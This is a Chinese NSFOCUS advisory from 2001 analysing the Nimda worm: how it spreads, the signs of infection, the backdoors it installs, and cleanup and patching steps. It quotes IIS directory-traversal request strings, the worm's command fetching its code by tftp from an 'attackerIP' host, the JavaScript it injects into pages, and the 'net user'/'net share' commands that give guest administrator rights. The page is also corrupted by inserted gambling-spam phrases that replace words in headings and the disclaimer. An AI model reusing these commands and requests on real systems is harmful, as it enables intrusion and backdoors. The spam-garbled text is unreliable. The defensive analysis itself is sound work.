首页 -> 安全2017最新注册送体验

安全2017最新注册送体验

紧急通告
绿盟科技紧急通告(Alert2001-02)

NSFOCUS安全小组([email protected])
http://www.nsfocus.com

防范"Nimda"蠕虫!

发布日期:2001-09-21


受影响的软件及系统:
====================
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows ME
Microsoft Windows NT 4.0
Microsoft Windows 2000
Microsoft Windows XP

综述:
======
一种新型的恶意蠕虫"Nimda"(又称"概念病毒(CV) v.5")正在广泛传播。它影响所有未安装补丁的Windows系统,破坏力极大。

分析:
======
该蠕虫使用多种途径进行传播:
  
    。通过email邮件传播
    。通过网络共享传播
    。通过主动扫描并攻击未打补丁的IIS服务器传播
    。通过浏览被篡改网页传播

这个蠕虫的传播利用了如下四个安全漏洞:

    。微软IE异常处理MIME头漏洞
      
      IE在处理MIME头中"Content-Type:"处指定的某些类型时,存在问题,攻击者可以
      利用这类缺陷在IE客户端执行任意命令.
      
      参见下列链接:
      http://security.nsfocus.com/showQuery.asp?bugID=1350
      http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
    
    。Microsoft IIS Unicode解码目录遍历漏洞(中联绿盟安全2018博彩游戏网站大全(SA2000-06))
    
      微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户
      可以远程通过IIS执行任意命令
      
      参见下列链接:
      http://www.nsfocus.com/sa-06.htm
      http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
  
    。Microsoft IIS CGI文件名错误解码漏洞(中联绿盟安全2018博彩游戏网站大全(SA2001-02))
      
      微软IIS 4.0/5.0在处理CGI程序文件名时存在一个安全漏洞,由于错误地对文件名
      进行了两次解码,攻击者可能利用这个漏洞执行任意系统命令
      
      参见下列链接:
      http://www.nsfocus.com/sa01-02.htm
      http://www.microsoft.com/technet/security/bulletin/ms01-026.asp

    。"CodeRedII"和Sadmind/IIS蠕虫留下的后门程序
      
      参见下列链接:
      http://www.nsfocus.com/alert01-001.htm
      http://www.cert.org/advisories/CA-2001-11.html
    

蠕虫特征:
==========

  。邮件传播时的特征:
    - 邮件信息的主题行文本内容不定
    - 邮件正文显示未空
    - 包含一个名为"readme.exe"的base64编码的可执行附件
    - 附件大小为57344字节
    
  。被感染系统特征:
  
    - 在C:\、D:\、E:\系统盘下以及其他目录下有很多Admin.dll文件
    - 存在大量的readme.eml或者readme.nws文件
    - 存在大量的riched20.dll文件
    - \Windows\System目录下有load.exe文件
    - 在Windows临时目录下存在很多名为"MEP*.TMP.EXE"的文件。
    - C盘被设为共享,共享名为C$
    - guest用户被激活并被加到管理员组
    
    注:上述文件大都被设置了隐藏、系统属性,您需要在资源管理器中设置"查看所有
    类型"文件才可以看到。
    
  。被攻击的IIS服务器的日志记录中有如下字符串:
    
        GET /scripts/root.exe?/c+dir
        GET /MSADC/root.exe?/c+dir
        GET /c/winnt/system32/cmd.exe?/c+dir
        GET /d/winnt/system32/cmd.exe?/c+dir
        GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
        GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
        GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
        GET msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../
        winnt/system32/cmd.exe?/c+dir
        GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
      
       注:这并不意味着这个系统已经被感染,只是表明曾经遭受过攻击。

    。 从受感染主机会往外部地址TCP 80端口发起大量连接。


蠕虫危害:
==========

    - 产生大量的垃圾邮件
    - 用蠕虫副本替换系统文件,可能影响word,frontpage等软件的正常工作
    - 严重降低系统以及网络性能
    - 创建开放共享,大大降低了系统的安全性
    - 将Guest帐号赋予管理员权限,降低了系统的安全性    

蠕虫行为分析:
============

    
  这个蠕虫的行为可以分为三个部分:传播、系统感染、安装后门
    
  【传播】
  
   。Email传播
    
    蠕虫会向被攻击者的邮件地址发送一封携带了蠕虫附件的邮件。这个邮件由两部分
    MIME类型的信息组成。第一部分的MIME类型为"text/html",但却没有包含文本,因
    此看起来是空的。第二部分的MIME类型为"audio/x-wav",但它实际上携带的是一个
    名为"readme.exe"的base64编码的可执行附件。
    
    利用了“微软IE异常处理MIME头漏洞” 安全漏洞,任何运行在x86平台下并且使用微
    软IE 5.5 SP1或之前版本(IE 5.01 SP2除外)来显示HTML邮件的邮件客户端软件,
    都将自动执行邮件附件。用户甚至只需打开或预览邮件即可使蠕虫被执行。

    被蠕虫攻击的目标邮件的地址从下列两个来源中获得:
    
      。用户web cache文件夹中的.htm和.html文件
      。用户通过MAPI服务收到的email邮件的内容
    
    蠕虫在这些文件中搜索看起来象邮件地址的字符串,然后向这些地址发送一份包含蠕
    虫拷贝的邮件。Nimda蠕虫在Windows注册表中记录最后一批邮件发送的时间,然后每
    10天重复搜索邮件地址并发送蠕虫邮件的过程。
  
   。IIS Web服务器传播
  
     蠕虫会利用两个IIS服务器的目录遍历漏洞和以前的一些IIS蠕虫(CodeRedII和
     Sadmind/IIS)留下的后门程序来进行传播。
    
     蠕虫按照下列几率来选择攻击目标的IP地址:

    。50%的几率,在与本地IP地址前2字节相同的地址(B类网络)中选择一个
    。25%的几率,在与本地IP地址前1字节相同的地址(A类网络)中选择一个
    。25%的几率,随机选择IP地址
    
    蠕虫会首先在启动一个tftp服务器,监听在udp/69端口。
    一旦发现受影响的主机,蠕虫会通过执行类似下列命令来向其发送蠕虫代码:
    "GET /scripts/root.exe?/c+tftp -i attackerIP GET Admin.dll HTTP/1.0"
    
    attackerIP就是正在发起攻击的蠕虫所在的主机IP.
    
    这样被攻击的主机上就产生了一个蠕虫的拷贝,命名为admin.dll.
    
    然后蠕虫会发送类似如下请求来执行蠕虫拷贝:
    "GET /scripts/Admin.dll HTTP/1.0"
    
    对于IIS 5.0,这也利用了另外一个IIS安全漏洞"Microsoft IIS 5.0 系统文件列表
    权限提升漏洞"。如果任何可执行文件的名字与IIS系统文件名列表中的文件匹配,则
    当它通过IIS被执行时就会在IIS 进程空间中运行,也就是以SYSTEM权限执行。
    admin.dll就是Frontapage扩展中所带的一个动态链接库,它刚好在IIS系统文件列表
    中。(参见链接:http://security.nsfocus.com/showQuery.asp?bugID=1748
    
    在执行完TFTP命令之后,当前目录下会产生一些临时文件,例如TFTP68等等,它们也
    是蠕虫拷贝。
    
    Admin.dll被运行时,它会把自己复制到\windows文件夹命名为mmc.exe,然后带上参
    数"-qusery9bnow"运行。
    
    蠕虫会在整个硬盘中搜索后缀为:".HTML"、".ASP"、".HTM",文件名为:"DEFAULT"
    、"INDEX"、"MAIN"、"README"的文件。一旦发现了这样的文件,蠕虫会在该目录下
    创建一个README.EML文件,它是一个由两部分组成的MIME编码的文件,里面也包含了
    蠕虫拷贝。然后蠕虫会在找到的文件的末尾增加如下JvaScript代码:
    <script language="JavaScript">
    window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
    
    这样,其他用户如果使用浏览器浏览被修改的网页或者资源管理(打开了预览功能)
    来浏览共享服务器上的README.EML文件时,利用IE浏览器"异常处理MIME头漏洞",蠕虫
    就可以传播到新的客户端上。

  。文件共享传播
  
    蠕虫访问共享网络资源,然后开始检测远程系统上的文件。
    
    如果发现一个.EXE文件,它将蠕虫代码加到原来文件的前面。下次执行被感染文件时
    将首先执行蠕虫代码。它并不感染'Winzip32.exe'。
    
    如果发现.DOC文件,它将自己拷贝到DOC文件所在目录下,改名为RICHED32.DLL,并
    设置隐藏、系统权限。由于Windows Word在打开该DOC文件时,会首先在当前目录寻
    找RICHED32.DLL,这将首先运行蠕虫代码。这也会大大增大远程用户的感染几率。
    
    它也会利用找到的文档文件的名字创建以.EML和.NWS后缀的文件,这些文件也是带有
    蠕虫拷贝的MIME编码的文件。
    
   【系统感染】
  
   蠕虫会检查注册表中的如下表项:
   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
   然后感染所有找到的程序。
  
   蠕虫会将自身拷贝到\Windows\System目录中,命名为load.exe.并修改SYSTEM.INI文件,
   将Shell部分改为如下内容:
   Shell = explorer.exe load.exe -dontrunold
   这样每次系统重启后都会运行蠕虫拷贝。
  
   它会用自身拷贝替换Windows目录下的Riched20.dll.这样下次执行word时会自动执行
   这个蠕虫。

   如果蠕虫是以README.EXE文件名被执行,它会将自身拷贝到windows临时目录中,并使
   用随机文件名,例如'MEP*.TMP.EXE'。
  
   蠕虫在第一次执行时会寻找"EXPLORER"进程,将自己的进程注册为"Explorer"的一个
   远程线程。这样即使用户退出系统,蠕虫仍然可以继续执行。

   【安装后门】
  
   Nimda蠕虫会修改一些注册表项以降低系统安全性,同时也安装了后门。
  
   蠕虫会将所有驱动器设置成共享状态,它会编辑如下注册表项:
   HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\[C$ -> Z$]
  
   蠕虫会删除下列注册表项的所有子键以禁止共享安全性:
   HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
  
   蠕虫会修改下列注册表项:
   HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
   调整 'Hidden', 'ShowSuperHidden'和 'HideFileExt' 键值,使得使用资源管理器无
   法显示隐藏文件。这可以保护蠕虫代码被发现。
  
   通过执行下列命令,蠕虫还激活了guest用户,将其密码设置为空,并将其加入到
   Administrators组中(对于Windows NT/2000/XP用户):
   net user guest /add
   net user guest /active
   net user guest ""
   net localgroup Administrators guest
   net localgroup Guests guest /add

   通过执行下列命令,蠕虫将C:\设置为完全共享:
   net share c$=c:\

解决方法:
==========
我们建议受到蠕虫感染的用户重新安装系统,以便清除其他潜在的后门。如果您不能立刻
重装系统,您可以参考下列步骤来清除蠕虫或者防止被蠕虫攻击:

1.  下载IE和IIS的补丁程序到受影响主机上
2.  安装杀毒软件和微软的CodeRedII清除程序
3.  备份重要数据
4.  断开网络连接(例如拔掉网线)
5.  执行杀毒工作,清除可能的CodeRedII蠕虫留下的后门
6.  安装IE和IIS的补丁
7.  重新启动系统
8.  再次运行杀毒软件以确保完全清除蠕虫病毒
9.  采取一些其他的预防措施(见下面的介绍)
10. 将计算机重新与网络连接

注:上述步骤仅供参考。

※  清除蠕虫:

由于蠕虫修改和替换了大量的系统文件,因此手工清除可能比较繁琐而且不易清除干净。
我们建议用户使用最新版本的反病毒厂商的杀毒软件来进行清除工作。目前各大反病毒厂
商都已经可以查杀这种蠕虫病毒。您可能需要多次运行杀毒软件或清除程序,以确保彻底
杀掉受感染的文件。

我们建议您在杀毒之前备份您的重要数据,以避免可能的数据丢失。

具体清除步骤如下(这时应当已经断开网络连接):

1. 对于Windows 95/98/ME用户,您需要手工编辑C:\windows\system.ini(假设您的Windows
   系统安装在C:\),找到如下行:
   Shell = explorer.exe load.exe -dontrunold
   将其改为:
   Shell = explorer.exe
   保存退出
   重新启动计算机
  
2. 运行杀毒软件清除病毒

4. 运行清除CodeRedII蠕虫的工具

5. 重新禁止guest用户,并将guest用户从Administrators组中删除(只有对于Windows NT
   /2000用户需要执行此步骤)

6. 检查您的共享。对于Windows 95/98/ME用户,应当删除各个硬盘的共享。
   对于Windows NT/2000用户,确保您的管理员口令具有足够的强度。

7. 重启动计算机并再次运行杀毒软件以确保完全清除蠕虫病毒


※  为了防止再次被蠕虫感染,您可能需要采取以下防范措施:

。对于不提供IIS服务的普通用户:

1. 您应当首先在IE浏览器菜单中选择:
   工具|Internet选项|安全|Inernet|自定义级别...|
   在“脚本”栏其中禁用"Java 小程序脚本"和"活动脚本"。在“下载”栏中禁止“文件
   下载”。以防止用户浏览被蠕虫感染的页面时自动下载并执行蠕虫代码。

2. 不要执行收到邮件中的附件程序。

3. 根据您浏览器的版本,将您的IE升级到下列最新版本之一:
  
   Internet Explorer 5.01 Service Pack 2:
   http://www.microsoft.com/windows/ie/downloads/recommended/ie501sp2/default.asp
  
   Internet Explorer 5.5 Service Pack 2:
   http://www.microsoft.com/windows/ie/downloads/recommended/ie55sp2/default.asp
  
   Internet Explorer 6:
   http://www.microsoft.com/windows/ie/downloads/ie6/default.asp

注:如果您并不需要使用IIS服务,但是由于缺省安装时选择了IIS服务,那么我们建议您
立刻卸载或者禁止启动IIS服务。

。对于需要提供IIS服务的用户:

1. 禁止任何用户执行tftp.exe和cmd.exe
  
   对于使用NTFS分区的用户,您可以以管理员身份在命令行窗口中执行下列命令:
  
   c:\> cacls %systemroot%\system32\tftp.exe /e /d Everyone
   c:\> cacls %systemroot%\system32\cmd.exe /e /d Everyone
  
  如果您的系统使用的是FAT32分区而不是NTFS分区,上述命令无效,您可以通过将
  tftp.exe和cmd.exe改名来使蠕虫不能执行这两个程序。其他一些重要的程序可能也需要
  进行权限限制,例如net.exe, ftp.exe等等

2. 检查是否您的系统中还有CodeRedII或者Sadmind/IIS蠕虫留下的后门,您可以使用微
  软提供的清除工具CodeRedCleanup来进行清除:
  
   您可以在下列地址下载此工具:
   http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31878
    
3. 使用regedit删除下列键值(可选)

   HKEY_CLASSES_ROOT\.eml
   HKEY_CLASSES_ROOT\.nws

4. 删除不必要的可执行虚拟目录,例如/scripts,/MSADC, /_vti_bin等等。
  
5. 安装最新的安全补丁:

   Windows NT 4系统
    
     . 安装微软最新的IIS安全漏洞补丁合集:
    
     http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32061
    
     注: 在下拉框中选择相应的语言版本(例如简体中文版或者英文版)下载。

    上述补丁可以安装在安装了SP5或者SP6的Windows NT系统中
    
   Windows 2000系统            
  
    . 安装微软最新的IIS安全漏洞补丁合集:
    
    http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32011
    
    注: 在下拉框中选择相应的语言版本(例如简体中文版或者英文版)下载
    
    上述补丁可以安装在SP1或SP2的Windows 2000系统中
    
    注意:安装补丁的时候最好断掉网络连接。

。对于提供了文件共享服务的用户:

检查您的文件共享目录,如果您并不真的需要提供文件共享服务。删除共享。
如果您必须要提供共享服务,确保为其设置足够强度的口令,并尽量禁止共享目录开放写
权限。

附录:各大杀毒厂商的地址:

    杀毒软件厂商信息
    
    Aladding Knowledge Systems
    http://www.eSafe.com/home/csrt/valerts2.asp?virus_no=10087
    
    Central Command, Inc.
    http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?p_refno=010918-000005
    
    Command Software Systems
    http://www.commandsoftware.com/virus/nimda.html
    
    F-Secure Corp
    http://www.datafellows.com/v-descs/nimda.shtml
    
    McAfee
    http://vil.mcafee.com/dispVirus.asp?virus_k=99209
    
    Panda Software
    http://service.pandasoftware.es/library/card.jsp?Virus=Nimda
    
    Proland Software
    http://www.pspl.com/virus_info/worms/nimda.htm
    
    Sophos
    http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
    
    Symantec
    http://www.symantec.com/avcenter/venc/data/[email protected]
    
    Trend Micro
    http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
    http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
    
    金山公司:
    http://www.iduba.net/resource/special/Concept/index.htm
    
    瑞星公司:
    http://www.rising.com.cn/
    
参考资料:

[1.] CERT Incident Note CA-2001-26 :
     http://www.cert.org/advisories/CA-2001-26.html
[2.] Symantec:
     http://www.symantec.com/avcenter/venc/data/[email protected]
[3.] F-Secure Corp
     http://www.datafellows.com/v-descs/nimda.shtml

声 明
==========

本安全2018博彩游戏网站大全仅用来描述可能存在的安全问题,绿盟科技不为此安全2018博彩游戏网站大全提供任何保证或承诺。由于传播、利用此安全2018博彩游戏网站大全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全2018博彩游戏网站大全作者不为此承担任何责任。绿盟科技拥有对此安全2018博彩游戏网站大全的修改和解释权。如欲转载或传播此安全2018博彩游戏网站大全,必须保证此安全2018博彩游戏网站大全的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全2018博彩游戏网站大全内容,不得以任何方式将其用于商业目的。

关于绿盟科技
============

绿盟科技(NSFOCUS Co., Ltd.)是中国网络安全领域的领导企业,致力于网络和系统安全问题的2017最新注册送体验、高端网络安全产品的研发、销售与网络安全服务,在入侵检测/保护、远程评估、 DDoS攻击防护等方面提供具有国际竞争能力的先进产品,是国内最具安全服务经验的专业公司。有关绿盟科技的详情请参见: http://www.nsfocus.com

© 2018 绿盟科技

2017最新注册送体验